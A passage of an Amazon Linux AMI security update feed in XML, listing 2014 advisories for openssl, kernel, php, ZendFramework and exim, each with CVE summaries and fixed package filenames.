release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/transmission-2.84-1.9.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-391</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-391: medium priority package update for openssl</title><issued date="2014-08-07 12:26:00" /><updated date="2014-09-19 11:59:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-5139:
1127491:
CVE-2014-5139 openssl: crash with SRP ciphersuite in Server Hello message
CVE-2014-3512:
1127505:
CVE-2014-3512 openssl: SRP buffer overrun
CVE-2014-3511:
1127504:
CVE-2014-3511 openssl: TLS protocol downgrade attack
CVE-2014-3510:
1127503:
CVE-2014-3510 openssl: DTLS anonymous (EC)DH denial of service
CVE-2014-3509:
1127498:
CVE-2014-3509 openssl: race condition in ssl_parse_serverhello_tlsext
CVE-2014-3508:
1127490:
CVE-2014-3508 openssl: information leak in pretty printing functions
CVE-2014-3507:
1127502:
CVE-2014-3507 openssl: DTLS memory leak from zero-length fragments
CVE-2014-3506:
1127500:
CVE-2014-3506 openssl: DTLS memory exhaustion
CVE-2014-3505:
1127499:
CVE-2014-3505 openssl: DTLS packet processing double free
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3505" title="" id="CVE-2014-3505" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3506" title="" id="CVE-2014-3506" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3507" title="" id="CVE-2014-3507" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3508" title="" id="CVE-2014-3508" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3509" title="" id="CVE-2014-3509" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3510" title="" id="CVE-2014-3510" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3511" title="" id="CVE-2014-3511" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3512" title="" id="CVE-2014-3512" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5139" title="" id="CVE-2014-5139" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl-static" version="1.0.1i" release="1.78.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-static-1.0.1i-1.78.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.1i" release="1.78.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.1i-1.78.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.1i" release="1.78.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-devel-1.0.1i-1.78.amzn1.x86_64.rpm</filename></package><package name="openssl" version="1.0.1i" release="1.78.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-1.0.1i-1.78.amzn1.x86_64.rpm</filename></package><package name="openssl-perl" version="1.0.1i" release="1.78.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-perl-1.0.1i-1.78.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.1i" release="1.78.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-devel-1.0.1i-1.78.amzn1.i686.rpm</filename></package><package name="openssl-debuginfo" version="1.0.1i" release="1.78.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-debuginfo-1.0.1i-1.78.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.1i" release="1.78.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-perl-1.0.1i-1.78.amzn1.i686.rpm</filename></package><package name="openssl" version="1.0.1i" release="1.78.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-1.0.1i-1.78.amzn1.i686.rpm</filename></package><package name="openssl-static" version="1.0.1i" release="1.78.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-static-1.0.1i-1.78.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-392</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-392: medium priority package update for kernel</title><issued date="2014-08-21 11:03:00" /><updated date="2014-09-19 11:43:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-3153:
The futex_requeue function in kernel/futex.c in the Linux kernel through 3.14.5 does not ensure that calls have two different futex addresses, which allows local users to gain privileges via a crafted FUTEX_REQUEUE command that facilitates unsafe waiter modification.
A flaw was found in the way the Linux kernel's futex subsystem handled the requeuing of certain Priority Inheritance (PI) futexes. A local, unprivileged user could use this flaw to escalate their privileges on the system.
1103626:
CVE-2014-3153 kernel: futex: pi futexes requeue issue
CVE-2014-1739:
The media_device_enum_entities function in drivers/media/media-device.c in the Linux kernel before 3.14.6 does not initialize a certain data structure, which allows local users to obtain sensitive information from kernel memory by leveraging /dev/media0 read access for a MEDIA_IOC_ENUM_ENTITIES ioctl call.
1109774:
CVE-2014-1739 Kernel: drivers: media: an information leakage
CVE-2014-0196:
The n_tty_write function in drivers/tty/n_tty.c in the Linux kernel through 3.14.3 does not properly manage tty driver access in the "LECHO & !OPOST" case, which allows local users to cause a denial of service (memory corruption and system crash) or gain privileges by triggering a race condition involving read and write operations with long strings.
1094232:
CVE-2014-0196 kernel: pty layer race condition leading to memory corruption
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0196" title="" id="CVE-2014-0196" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1739" title="" id="CVE-2014-1739" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3153" title="" id="CVE-2014-3153" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-headers" version="3.10.53" release="56.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-3.10.53-56.140.amzn1.x86_64.rpm</filename></package><package name="kernel" version="3.10.53" release="56.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-3.10.53-56.140.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="3.10.53" release="56.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-3.10.53-56.140.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="3.10.53" release="56.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-3.10.53-56.140.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="3.10.53" release="56.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-3.10.53-56.140.amzn1.x86_64.rpm</filename></package><package name="perf" version="3.10.53" release="56.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-3.10.53-56.140.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="3.10.53" release="56.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-3.10.53-56.140.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="3.10.53" release="56.140.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-3.10.53-56.140.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="3.10.53" release="56.140.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-3.10.53-56.140.amzn1.i686.rpm</filename></package><package name="perf" version="3.10.53" release="56.140.amzn1" epoch="0" arch="i686"><filename>Packages/perf-3.10.53-56.140.amzn1.i686.rpm</filename></package><package name="kernel" version="3.10.53" release="56.140.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-3.10.53-56.140.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="3.10.53" release="56.140.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-3.10.53-56.140.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="3.10.53" release="56.140.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-3.10.53-56.140.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="3.10.53" release="56.140.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-3.10.53-56.140.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="3.10.53" release="56.140.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-3.10.53-56.140.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-393</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-393: medium priority package update for php</title><issued date="2014-08-21 11:15:00" /><updated date="2014-09-19 12:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-4049:
Heap-based buffer overflow in the php_parserr function in ext/standard/dns.c in PHP 5.6.0beta4 and earlier allows remote servers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted DNS TXT record, related to the dns_get_record function.
A heap-based buffer overflow flaw was found in the way PHP parsed DNS TXT records. A malicious DNS server or a man-in-the-middle attacker could possibly use this flaw to execute arbitrary code as the PHP interpreter if a PHP application used the dns_get_record() function to perform a DNS query.
1108447:
CVE-2014-4049 php: heap-based buffer overflow in DNS TXT record parsing
CVE-2014-3981:
acinclude.m4, as used in the configure script in PHP 5.5.13 and earlier, allows local users to overwrite arbitrary files via a symlink attack on the /tmp/phpglibccheck file.
1104978:
CVE-2014-3981 php: insecure temporary file use in the configure script
CVE-2014-3515:
A type confusion issue was found in the SPL ArrayObject and SPLObjectStorage classes' unserialize() method. A remote attacker able to submit specially crafted input to a PHP application, which would then unserialize this input using one of the aforementioned methods, could use this flaw to execute arbitrary code with the privileges of the user running that PHP application.
1112154:
CVE-2014-3515 php: unserialize() SPL ArrayObject / SPLObjectStorage type confusion flaw
CVE-2014-0238:
The cdf_read_property_info function in cdf.c in the Fileinfo component in PHP before 5.4.29 and 5.5.x before 5.5.13 allows remote attackers to cause a denial of service (infinite loop or out-of-bounds memory access) via a vector that (1) has zero length or (2) is too long.
A denial of service flaw was found in the way the File Information (fileinfo) extension parsed certain Composite Document Format (CDF) files. A remote attacker could use this flaw to crash a PHP application using fileinfo via a specially crafted CDF file.
1098155:
CVE-2014-0238 file: CDF property info parsing nelements infinite loop
CVE-2014-0237:
The cdf_unpack_summary_info function in cdf.c in the Fileinfo component in PHP before 5.4.29 and 5.5.x before 5.5.13 allows remote attackers to cause a denial of service (performance degradation) by triggering many file_printf calls.
A denial of service flaw was found in the way the File Information (fileinfo) extension parsed certain Composite Document Format (CDF) files. A remote attacker could use this flaw to crash a PHP application using fileinfo via a specially crafted CDF file.
1098193:
CVE-2014-0237 file: cdf_unpack_summary_info() excessive looping DoS
CVE-2014-0207:
The cdf_read_short_sector function in cdf.c in file before 5.19, as used in the Fileinfo component in PHP before 5.4.30 and 5.5.x before 5.5.14, allows remote attackers to cause a denial of service (assertion failure and application exit) via a crafted CDF file.
A denial of service flaw was found in the way the File Information (fileinfo) extension parsed certain Composite Document Format (CDF) files. A remote attacker could use this flaw to crash a PHP application using fileinfo via a specially crafted CDF file.
1091842:
CVE-2014-0207 file: cdf_read_short_sector insufficient boundary check
CVE-2013-6712:
A buffer over-read flaw was found in the way the DateInterval class parsed interval specifications. An attacker able to make a PHP application parse a specially crafted specification using DateInterval could possibly cause the PHP interpreter to crash.
1035670:
CVE-2013-6712 php: heap-based buffer over-read in DateInterval
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6712" title="" id="CVE-2013-6712" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0207" title="" id="CVE-2014-0207" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0237" title="" id="CVE-2014-0237" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0238" title="" id="CVE-2014-0238" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3515" title="" id="CVE-2014-3515" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3981" title="" id="CVE-2014-3981" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4049" title="" id="CVE-2014-4049" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php-debuginfo" version="5.3.29" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-debuginfo-5.3.29-1.7.amzn1.x86_64.rpm</filename></package><package name="php-tidy" version="5.3.29" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-tidy-5.3.29-1.7.amzn1.x86_64.rpm</filename></package><package name="php-enchant" version="5.3.29" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-enchant-5.3.29-1.7.amzn1.x86_64.rpm</filename></package><package name="php" version="5.3.29" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-5.3.29-1.7.amzn1.x86_64.rpm</filename></package><package name="php-pdo" version="5.3.29" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pdo-5.3.29-1.7.amzn1.x86_64.rpm</filename></package><package name="php-mcrypt" version="5.3.29" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mcrypt-5.3.29-1.7.amzn1.x86_64.rpm</filename></package><package name="php-mssql" version="5.3.29" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mssql-5.3.29-1.7.amzn1.x86_64.rpm</filename></package><package name="php-cli" version="5.3.29" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-cli-5.3.29-1.7.amzn1.x86_64.rpm</filename></package><package name="php-recode" version="5.3.29" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-recode-5.3.29-1.7.amzn1.x86_64.rpm</filename></package><package name="php-ldap" version="5.3.29" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-ldap-5.3.29-1.7.amzn1.x86_64.rpm</filename></package><package name="php-dba" version="5.3.29" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-dba-5.3.29-1.7.amzn1.x86_64.rpm</filename></package><package name="php-xml" version="5.3.29" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-xml-5.3.29-1.7.amzn1.x86_64.rpm</filename></package><package name="php-intl" version="5.3.29" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-intl-5.3.29-1.7.amzn1.x86_64.rpm</filename></package><package name="php-snmp" version="5.3.29" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-snmp-5.3.29-1.7.amzn1.x86_64.rpm</filename></package><package name="php-embedded" version="5.3.29" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-embedded-5.3.29-1.7.amzn1.x86_64.rpm</filename></package><package name="php-xmlrpc" version="5.3.29" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-xmlrpc-5.3.29-1.7.amzn1.x86_64.rpm</filename></package><package name="php-imap" version="5.3.29" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-imap-5.3.29-1.7.amzn1.x86_64.rpm</filename></package><package name="php-devel" version="5.3.29" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-devel-5.3.29-1.7.amzn1.x86_64.rpm</filename></package><package name="php-bcmath" version="5.3.29" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-bcmath-5.3.29-1.7.amzn1.x86_64.rpm</filename></package><package name="php-odbc" version="5.3.29" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-odbc-5.3.29-1.7.amzn1.x86_64.rpm</filename></package><package name="php-soap" version="5.3.29" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-soap-5.3.29-1.7.amzn1.x86_64.rpm</filename></package><package name="php-mysql" version="5.3.29" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mysql-5.3.29-1.7.amzn1.x86_64.rpm</filename></package><package name="php-mysqlnd" version="5.3.29" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mysqlnd-5.3.29-1.7.amzn1.x86_64.rpm</filename></package><package name="php-mbstring" version="5.3.29" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mbstring-5.3.29-1.7.amzn1.x86_64.rpm</filename></package><package name="php-pgsql" version="5.3.29" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pgsql-5.3.29-1.7.amzn1.x86_64.rpm</filename></package><package name="php-gd" version="5.3.29" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-gd-5.3.29-1.7.amzn1.x86_64.rpm</filename></package><package name="php-process" version="5.3.29" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-process-5.3.29-1.7.amzn1.x86_64.rpm</filename></package><package name="php-fpm" version="5.3.29" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-fpm-5.3.29-1.7.amzn1.x86_64.rpm</filename></package><package name="php-common" version="5.3.29" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-common-5.3.29-1.7.amzn1.x86_64.rpm</filename></package><package name="php-pspell" version="5.3.29" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pspell-5.3.29-1.7.amzn1.x86_64.rpm</filename></package><package name="php-enchant" version="5.3.29" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php-enchant-5.3.29-1.7.amzn1.i686.rpm</filename></package><package name="php" version="5.3.29" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php-5.3.29-1.7.amzn1.i686.rpm</filename></package><package name="php-devel" version="5.3.29" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php-devel-5.3.29-1.7.amzn1.i686.rpm</filename></package><package name="php-xmlrpc" version="5.3.29" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php-xmlrpc-5.3.29-1.7.amzn1.i686.rpm</filename></package><package name="php-bcmath" version="5.3.29" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php-bcmath-5.3.29-1.7.amzn1.i686.rpm</filename></package><package name="php-fpm" version="5.3.29" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php-fpm-5.3.29-1.7.amzn1.i686.rpm</filename></package><package name="php-tidy" version="5.3.29" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php-tidy-5.3.29-1.7.amzn1.i686.rpm</filename></package><package name="php-embedded" version="5.3.29" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php-embedded-5.3.29-1.7.amzn1.i686.rpm</filename></package><package name="php-mysql" version="5.3.29" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php-mysql-5.3.29-1.7.amzn1.i686.rpm</filename></package><package name="php-xml" version="5.3.29" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php-xml-5.3.29-1.7.amzn1.i686.rpm</filename></package><package name="php-mcrypt" version="5.3.29" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php-mcrypt-5.3.29-1.7.amzn1.i686.rpm</filename></package><package name="php-snmp" version="5.3.29" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php-snmp-5.3.29-1.7.amzn1.i686.rpm</filename></package><package name="php-pspell" version="5.3.29" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php-pspell-5.3.29-1.7.amzn1.i686.rpm</filename></package><package name="php-mssql" version="5.3.29" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php-mssql-5.3.29-1.7.amzn1.i686.rpm</filename></package><package name="php-ldap" version="5.3.29" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php-ldap-5.3.29-1.7.amzn1.i686.rpm</filename></package><package name="php-intl" version="5.3.29" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php-intl-5.3.29-1.7.amzn1.i686.rpm</filename></package><package name="php-odbc" version="5.3.29" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php-odbc-5.3.29-1.7.amzn1.i686.rpm</filename></package><package name="php-debuginfo" version="5.3.29" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php-debuginfo-5.3.29-1.7.amzn1.i686.rpm</filename></package><package name="php-pdo" version="5.3.29" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php-pdo-5.3.29-1.7.amzn1.i686.rpm</filename></package><package name="php-mbstring" version="5.3.29" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php-mbstring-5.3.29-1.7.amzn1.i686.rpm</filename></package><package name="php-gd" version="5.3.29" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php-gd-5.3.29-1.7.amzn1.i686.rpm</filename></package><package name="php-recode" version="5.3.29" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php-recode-5.3.29-1.7.amzn1.i686.rpm</filename></package><package name="php-pgsql" version="5.3.29" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php-pgsql-5.3.29-1.7.amzn1.i686.rpm</filename></package><package name="php-imap" version="5.3.29" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php-imap-5.3.29-1.7.amzn1.i686.rpm</filename></package><package name="php-cli" version="5.3.29" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php-cli-5.3.29-1.7.amzn1.i686.rpm</filename></package><package name="php-soap" version="5.3.29" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php-soap-5.3.29-1.7.amzn1.i686.rpm</filename></package><package name="php-process" version="5.3.29" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php-process-5.3.29-1.7.amzn1.i686.rpm</filename></package><package name="php-dba" version="5.3.29" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php-dba-5.3.29-1.7.amzn1.i686.rpm</filename></package><package name="php-common" version="5.3.29" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php-common-5.3.29-1.7.amzn1.i686.rpm</filename></package><package name="php-mysqlnd" version="5.3.29" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php-mysqlnd-5.3.29-1.7.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-394</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-394: medium priority package update for php-ZendFramework</title><issued date="2014-08-21 11:18:00" /><updated date="2014-09-19 11:48:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-4914:
1117545:
CVE-2014-4914 Zend FrameWork: ZF2014-04: Potential SQL injection in the ORDER implementation of Zend_Db_Select
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4914" title="" id="CVE-2014-4914" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php-ZendFramework-Serializer-Adapter-Igbinary" version="1.12.7" release="1.9.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Serializer-Adapter-Igbinary-1.12.7-1.9.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-full" version="1.12.7" release="1.9.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-full-1.12.7-1.9.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Db-Adapter-Pdo-Mysql" version="1.12.7" release="1.9.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Db-Adapter-Pdo-Mysql-1.12.7-1.9.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Dojo" version="1.12.7" release="1.9.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Dojo-1.12.7-1.9.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Db-Adapter-Pdo" version="1.12.7" release="1.9.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Db-Adapter-Pdo-1.12.7-1.9.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Pdf" version="1.12.7" release="1.9.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Pdf-1.12.7-1.9.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Services" version="1.12.7" release="1.9.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Services-1.12.7-1.9.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Search-Lucene" version="1.12.7" release="1.9.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Search-Lucene-1.12.7-1.9.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Cache-Backend-Libmemcached" version="1.12.7" release="1.9.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Cache-Backend-Libmemcached-1.12.7-1.9.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework" version="1.12.7" release="1.9.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-1.12.7-1.9.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Cache-Backend-Apc" version="1.12.7" release="1.9.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Cache-Backend-Apc-1.12.7-1.9.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-demos" version="1.12.7" release="1.9.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-demos-1.12.7-1.9.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Soap" version="1.12.7" release="1.9.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Soap-1.12.7-1.9.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Db-Adapter-Mysqli" version="1.12.7" release="1.9.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Db-Adapter-Mysqli-1.12.7-1.9.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Ldap" version="1.12.7" release="1.9.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Ldap-1.12.7-1.9.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-extras" version="1.12.7" release="1.9.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-extras-1.12.7-1.9.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Db-Adapter-Pdo-Pgsql" version="1.12.7" release="1.9.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Db-Adapter-Pdo-Pgsql-1.12.7-1.9.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Captcha" version="1.12.7" release="1.9.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Captcha-1.12.7-1.9.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Db-Adapter-Pdo-Mssql" version="1.12.7" release="1.9.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Db-Adapter-Pdo-Mssql-1.12.7-1.9.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Feed" version="1.12.7" release="1.9.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Feed-1.12.7-1.9.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Auth-Adapter-Ldap" version="1.12.7" release="1.9.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Auth-Adapter-Ldap-1.12.7-1.9.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Cache-Backend-Memcached" version="1.12.7" release="1.9.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Cache-Backend-Memcached-1.12.7-1.9.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-395</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-395: low priority package update for exim</title><issued date="2014-08-21 11:19:00" /><updated date="2014-09-19 11:48:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-2972:
1122552:
CVE-2014-2972 exim: local code execution via string expansion
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2972" title="" id="CVE-2014-2972" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="exim-pgsql" version="4.72" release="6.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-pgsql-4.72-6.6.amzn1.x86_64.rpm</filename></package><package name="exim-mon" version="4.72" release="6.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-mon-4.72-6.6.amzn1.x86_64.rpm</filename></package><package name="exim-greylist" version="4.72" release="6.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-greylist-4.72-6.6.amzn1.x86_64.rpm</filename></package><package name="exim" version="4.72" release="6.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-4.72-6.6.amzn1.x86_64.rpm</filename></package><package name="exim-debuginfo" version="4.72" release="6.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-debuginfo-4.72-6.6.amzn1.x86_64.rpm</filename></package><package name="exim-mysql" version="4.72" release="6.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-mysql-4.72-6.6.amzn1.x86_64.rpm</filename></package><package name="exim-mon" version="4.72" release="6.6.amzn1" epoch="0" 